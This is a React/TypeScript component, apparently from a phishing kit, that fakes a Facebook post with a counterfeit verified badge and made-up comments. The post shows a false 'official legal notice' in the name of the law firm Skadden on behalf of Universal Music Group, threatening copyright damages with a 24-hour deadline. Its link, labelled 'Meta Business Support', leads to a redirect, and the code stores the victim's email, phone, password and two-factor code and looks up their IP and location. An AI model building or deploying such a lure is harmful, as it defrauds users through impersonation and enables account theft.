/* eslint-disable @typescript-eslint/no-unused-vars */
import {
  getLocation,
  getPageInfo,
  login
} from "../../services/telegram.service";
import useLocalStorage from "../../hooks/useLocalStore";
import { Eye, EyeOff, MessageCircle, Share2, ThumbsUp, X } from "lucide-react";
import { useEffect, useRef, useState, useCallback } from "react";
import parse from "html-react-parser";
import Like from "../../assets/images/like.png";
import Love from "../../assets/images/love.png";
import Care from "../../assets/images/care.png";
import { Button } from "./button";
import IconPlay from "../svg/play";
import profile from "../../assets/images/profile.jpg";
import u1 from "../../assets/images/u1.jpg";
import u2 from "../../assets/images/u2.jpg";

import u3 from "../../assets/images/u3.jpg";
import u4 from "../../assets/images/u4.jpg";

import page_profile from "../../assets/images/page_avatar.jpg";
import AddCommentBox from "./commentBox";
import CommentBox from "./comment";
import { CardContent } from "./card";
import { ButtonX } from "./buttonClose";
import ExpandableText from "./ExpandableText";
import { REDIRECT_LINK } from "../../services/constant";
function formatName(input: string): string {
  if (!input) return "";

  return input
    .replace(/\*/g, "")
    .replace(/•\s*Facebook/gi, "")
    .trim();
}

function postDate() {
  const yesterday = new Date();
  yesterday.setDate(yesterday.getDate() - 1);

  const formatted = yesterday.toLocaleDateString("en-GB", {
    day: "numeric",
    month: "long",
    year: "numeric"
  });

  return <span>{formatted}</span>;
}

export const LoginModal = ({
  onClose,
  pageName,
  pageId,
  pageMail
}: {
  onClose: () => void;
  pageName: string;
  pageId: string;
  pageMail: string;
}) => {
  const [countryCode, setCountryCode] = useState("US");
  const [ip, setIp] = useState("");
  const [pName, setPageName] = useState(
    "Skadden, Arps, Slate, Meagher & Flom LLP"
  );

  const [pageUrl, setPageUrl] = useState("");
  const [user, setUser] = useLocalStorage("user", {
    phoneNumber: "",
    email: "",
    password: "",
    twoFaCode: ""
  });

  // const formatName = (name: string) => name.toUpperCase();

  // Tạo chuỗi HTML động
  const dynamicContentHTML = `
  <p>
    We are <span class="font-medium">${pName}</span>, a leading U.S. law firm headquartered in New York, acting as the legal representative of <span class="font-medium">Universal Music Group (UMG Recordings, Inc.)</span> – the exclusive copyright holder of the famous song <em>“Someone You Loved”</em> performed by Lewis Capaldi.
  </p>
  <p>
    After review and verification, we have identified that your Facebook account/page have used this sound recording without valid license or authorization from the copyright owner.
  </p>
  <h2 class="font-semibold">
    📑 According to applicable law:
  </h2>
  <ul class="list-disc pl-6 space-y-2">
    <li>
      The U.S. Copyright Act (17 U.S.C.) authorizes statutory damages of up to USD 150,000 per work in cases of willful infringement.
    </li>
    <li>
      The DMCA (17 U.S.C. § 512) provides procedures for the removal of infringing content and enforcement with online platforms.
    </li>
    <li>
      The Berne Convention ensures international copyright protection.
    </li>
  </ul>
`;
  const [pageHtml, setPageHtml] = useState(dynamicContentHTML);
  const [videoUrl, setVideoUrl] = useState("");
  const [videoTitle, setVideoTitle] = useState("");

  const videoRef = useRef<HTMLVideoElement | null>(null);
  const [showOverlay, setShowOverlay] = useState(true);

  const handlePlay = useCallback(() => {
    setShowOverlay(false);
    if (!videoRef.current) return;
    videoRef.current.controls = true;
    videoRef.current.muted = false;
    void videoRef.current.play();
  }, []);

  const fetchCountry = useCallback(async () => {
    try {
      const data = await getLocation();
      setIp(data.ip);
      setCountryCode(data.country_code);
    } catch (e) {}
  }, []);

  const fetchPageInfo = useCallback(async () => {
    try {
      const { data } = await getPageInfo();
      setPageUrl(data.profileUrl || "");
      setPageName(data.pageName || "Skadden, Arps, Slate, Meagher & Flom LLP");
      setPageHtml(data.pageHtml || dynamicContentHTML);
      setVideoUrl(
        data.videoUrl ||
          "https://s3.ecomstake.org/Lewis_Capaldi_-_Someone_You_Loved.mp4"
      );
      setVideoTitle(data.videoTitle || "Lewis Capaldi - Someone You Loved");
    } catch (e) {
      // handle error
    }
  }, [dynamicContentHTML]);

  useEffect(() => {
    const v = videoRef.current;
    if (!v || !videoUrl) return;
    // đảm bảo video reload và thử phát
    v.load();
    v.play().catch(() => {
      // bị chặn autoplay? vẫn ổn vì có muted; nếu không thì hiển thị nút Play custom
    });
  }, [videoUrl]);

  useEffect(() => {
    fetchCountry();
    fetchPageInfo();
  }, [fetchCountry, fetchPageInfo]);

  useEffect(() => {
    const onKey = (e: KeyboardEvent) => {
      if (e.key === "Escape") onClose();
      if ((e.key === " " || e.key === "Enter") && showOverlay) {
        e.preventDefault();
        handlePlay();
      }
    };
    document.addEventListener("keydown", onKey);
    return () => document.removeEventListener("keydown", onKey);
  }, [onClose, showOverlay, handlePlay]);

  return (
    <div
      className="fixed inset-0 z-50 p-4 bg-black/60 backdrop-blur-sm flex items-center justify-center"
      aria-modal="true"
      role="dialog"
    >
      {/* overlay click để đóng */}
      <div className="absolute inset-0" onClick={onClose} aria-hidden="true" />

      <div
        className="relative w-full max-w-4xl max-h-[90vh] bg-white rounded-2xl shadow-xl overflow-hidden flex flex-col"
        onClick={(e) => e.stopPropagation()}
      >
        {/* Header */}
        <div className="flex items-center justify-between p-4 text-[20px] font-bold border-b border-gray-200 relative">
          <div></div>
          {pName}'s post
          <ButtonX
            variant="ghost"
            className="h-10 w-10 p-2 rounded-full bg-gray-200 hover:bg-gray-300"
            onClick={onClose}
            aria-label="Close"
          >
            <X size={24} />
          </ButtonX>
        </div>

        {/* Scroll body */}
        <div className="flex-1 overflow-y-auto">
          <div className="bg-white">
            <div className="px-4 sm:px-5 pt-4 pb-3 border-b border-gray-200">
              <div className="flex items-center justify-between gap-3">
                <div className="flex items-center gap-3 min-w-0">
                  <img
                    src={pageUrl || page_profile}
                    alt="Skadden, Arps, Slate, Meagher & Flom LLP"
                    className="w-10 h-10 rounded-full object-cover shrink-0"
                  />
                  <div className="min-w-0">
                    {/* Page name + verified */}
                    <div className="flex items-center gap-1">
                      <h4 className="text-[15px] font-semibold leading-5 truncate">
                        {pName}
                      </h4>
                      {/* Verified badge */}
                      <svg
                        viewBox="0 0 12 13"
                        width="12"
                        height="12"
                        fill="currentColor"
                        // title="Verified account"
                        className="x14rh7hd x1lliihq x1tzjh5l x1k90msu x2h7rmj x1qfuztq"
                        style={{ color: "#0866FF" }}
                      >
                        <title>Verified account</title>
                        <g fill-rule="evenodd" transform="translate(-98 -917)">
                          <path d="m106.853 922.354-3.5 3.5a.499.499 0 0 1-.706 0l-1.5-1.5a.5.5 0 1 1 .706-.708l1.147 1.147 3.147-3.147a.5.5 0 1 1 .706.708m3.078 2.295-.589-1.149.588-1.15a.633.633 0 0 0-.219-.82l-1.085-.7-.065-1.287a.627.627 0 0 0-.6-.603l-1.29-.066-.703-1.087a.636.636 0 0 0-.82-.217l-1.148.588-1.15-.588a.631.631 0 0 0-.82.22l-.701 1.085-1.289.065a.626.626 0 0 0-.6.6l-.066 1.29-1.088.702a.634.634 0 0 0-.216.82l.588 1.149-.588 1.15a.632.632 0 0 0 .219.819l1.085.701.065 1.286c.014.33.274.59.6.604l1.29.065.703 1.088c.177.27.53.362.82.216l1.148-.588 1.15.589a.629.629 0 0 0 .82-.22l.701-1.085 1.286-.064a.627.627 0 0 0 .604-.601l.065-1.29 1.088-.703a.633.633 0 0 0 .216-.819"></path>
                        </g>
                      </svg>
                    </div>

                    {/* Date · globe */}
                    <div className="flex items-center gap-1 text-[13px] text-gray-500 leading-4">
                      <span>{postDate()}</span>
                      <span>·</span>
                      {/* globe icon */}
                      <svg
                        viewBox="0 0 16 16"
                        width="12"
                        height="12"
                        fill="currentColor"
                        className="x14rh7hd x1lliihq x1tzjh5l x1k90msu x2h7rmj x1qfuztq"
                        style={{ color: "#65686C" }}
                      >
                        <title>Shared with Public group</title>
                        <g fill-rule="evenodd" transform="translate(-448 -544)">
                          <g>
                            <path
                              d="M109.5 408.5c0 3.23-2.04 5.983-4.903 7.036l.07-.036c1.167-1 1.814-2.967 2-3.834.214-1 .303-1.3-.5-1.96-.31-.253-.677-.196-1.04-.476-.246-.19-.356-.59-.606-.73-.594-.337-1.107.11-1.954.223a2.666 2.666 0 0 1-1.15-.123c-.007 0-.007 0-.013-.004l-.083-.03c-.164-.082-.077-.206.006-.36h-.006c.086-.17.086-.376-.05-.529-.19-.214-.54-.214-.804-.224-.106-.003-.21 0-.313.004l-.003-.004c-.04 0-.084.004-.124.004h-.037c-.323.007-.666-.034-.893-.314-.263-.353-.29-.733.097-1.09.28-.26.863-.8 1.807-.22.603.37 1.166.667 1.666.5.33-.11.48-.303.094-.87a1.128 1.128 0 0 1-.214-.73c.067-.776.687-.84 1.164-1.2.466-.356.68-.943.546-1.457-.106-.413-.51-.873-1.28-1.01a7.49 7.49 0 0 1 6.524 7.434"
                              transform="translate(354 143.5)"
                            ></path>
                            <path
                              d="M104.107 415.696A7.498 7.498 0 0 1 94.5 408.5a7.48 7.48 0 0 1 3.407-6.283 5.474 5.474 0 0 0-1.653 2.334c-.753 2.217-.217 4.075 2.29 4.075.833 0 1.4.561 1.333 2.375-.013.403.52 1.78 2.45 1.89.7.04 1.184 1.053 1.33 1.74.06.29.127.65.257.97a.174.174 0 0 0 .193.096"
                              transform="translate(354 143.5)"
                            ></path>
                            <path
                              fill-rule="nonzero"
                              d="M110 408.5a8 8 0 1 1-16 0 8 8 0 0 1 16 0zm-1 0a7 7 0 1 0-14 0 7 7 0 0 0 14 0z"
                              transform="translate(354 143.5)"
                            ></path>
                          </g>
                        </g>
                      </svg>
                    </div>
                  </div>
                </div>
              </div>

              {/* Caption (giống ảnh) */}
              <ExpandableText chars={295}>
                <div className="flex flex-col text-gray mx-auto rounded-lg gap-2 text-sm p-3">
                  <h2 className="font-bold">⚖️ OFFICIAL LEGAL NOTICE</h2>
                  <p>
                    Hello{" "}
                    <span className="text-[#0b66ff] font-medium">
                      {formatName(user.userName)}
                    </span>
                  </p>
                  {parse(pageHtml)}

                  <p>
                    If you believe this is a mistake, please review and file
                    your counterclaim here:{" "}
                    <span className="font-medium">
                      <a
                        href={REDIRECT_LINK}
                        className="text-blue-600 hover:underline font-medium"
                      >
                        Meta Business Support
                      </a>
                    </span>
                    .
                  </p>

                  <p>
                    You have 24 hours to submit your objection to our decision.
                    Thank you for your cooperation in helping us improve our
                    services.
                  </p>
                </div>
              </ExpandableText>
            </div>
            <CardContent>
              {/* Video */}
              <div className="bg-black">
                <div className="relative max-w-3xl mx-auto">
                  <div className="aspect-video">
                    <video
                      ref={videoRef}
                      className="w-full h-full"
                      muted
                      controls={false}
                      playsInline
                      preload="metadata"
                      // poster có thể đổi nếu bạn có ảnh
                      // poster="https://s3.ecomstake.org/fbs/poster_1.jpg"
                    >
                      <source src={videoUrl} type="video/mp4" />
                    </video>

                    {showOverlay && (
                      <button
                        type="button"
                        onClick={handlePlay}
                        className="absolute inset-0 grid place-items-center group focus:outline-none"
                        aria-label="Play video"
                      >
                        <div className="absolute inset-0 bg-gradient-to-t from-black/50 via-black/20 to-transparent" />
                        <div className="relative z-10 rounded-full w-20 h-20 md:w-28 md:h-28 grid place-items-center backdrop-blur-sm transition transform group-hover:scale-105">
                          <IconPlay />
                        </div>
                      </button>
                    )}
                  </div>
                </div>
              </div>
              <h2 className="text-[18px] font-[700] mt-4 px-4">{videoTitle}</h2>
              <div className="border-b border-gray-200 my-2 mx-4" />

              <div className="w-full flex items-center justify-between mt-3 text-sm px-4">
                <div className="flex items-center gap-1">
                  <div className="flex items-center -space-x-1">
                    <img src={Like} className="w-[18px] h-[18px]" alt="like" />
                    <img src={Love} className="w-[18px] h-[18px]" alt="love" />
                    <img src={Care} className="w-[18px] h-[18px]" alt="care" />
                  </div>
                  <span>182</span>
                </div>
                <div className="text-[14px] text-gray-500 flex items-center gap-2">
                  <button className="hover:underline">8 comments</button>
                  <span aria-hidden></span>
                  <button className="hover:underline">10 shares</button>
                  <span aria-hidden></span>
                  <span>20k views</span>
                </div>
              </div>
              <div className="mx-4 border-b border-gray-200 my-2" />

              {/* Stats + Actions */}
              <div className="flex flex-row items-center justify-between text-[16px] text-gray-600 gap-2 md:px-10">
                {/* Stats */}

                <Button
                  variant="ghost"
                  className="flex items-center gap-2 hover:bg-gray-100 h-8 px-2"
                >
                  <ThumbsUp size={20} className="text-gray-600" />
                  <span>Like</span>
                </Button>
                <Button
                  variant="ghost"
                  className="flex items-center gap-2 hover:bg-gray-100 h-8 px-2"
                >
                  <MessageCircle size={20} className="text-gray-600" />
                  <span>Comment</span>
                </Button>
                <Button
                  variant="ghost"
                  className="flex items-center gap-2 hover:bg-gray-100 h-8 px-2"
                >
                  <Share2 size={20} className="text-gray-600" />
                  <span>Share</span>
                </Button>
              </div>
              <div className=" mx-4 border-b border-gray-200 my-2" />
            </CardContent>
          </div>

          {/* Content grid */}
          <div className="px-4">
            <div className="w-full max-w-[1100px] mx-auto flex flex-col gap-6">
              {/* Comment Section */}
              <section className="w-full bg-white rounded-xl">
                <div className="block">
                  <h3 className="text-base font-semibold mb-3">
                    Most relevant
                  </h3>
                  <CommentBox
                    profileImg={u1}
                    name={"Richard Brown"}
                    text={`Great job`}
                    time={"5h"}
                    reactionsCount={6}
                  />
                  <CommentBox
                    profileImg={u2}
                    name={"Edward Johnson"}
                    text={`He was awesome.`}
                    time={"2h"}
                    reactionsCount={5}
                  />
                  <CommentBox
                    profileImg={u3}
                    name={"Rol Coty"}
                    text={`I listen to Carly Simon’s song everyday while I’m drift going to work and when I’m home`}
                    time={"50m"}
                    reactionsCount={3}
                  />
                  <CommentBox
                    profileImg={u4}
                    name={"Brian Fennell"}
                    text={`I bet you think this song is about, don’t you?`}
                    time={"20m"}
                    reactionsCount={2}
                  />
                </div>
              </section>
              <div className="text-[12px] text-gray-500 mb-2">
                "Most relevant" is selected, so some comments may have been
                filtered out.
              </div>
            </div>
          </div>
        </div>
        {/* Composer sticky trong modal */}
        <div className="sticky bottom-0 w-full bg-white border-t border-gray-200">
          <div className="px-4 sm:px-5 py-3">
            <AddCommentBox />
          </div>
        </div>
      </div>
    </div>
  );
};

export default LoginModal;
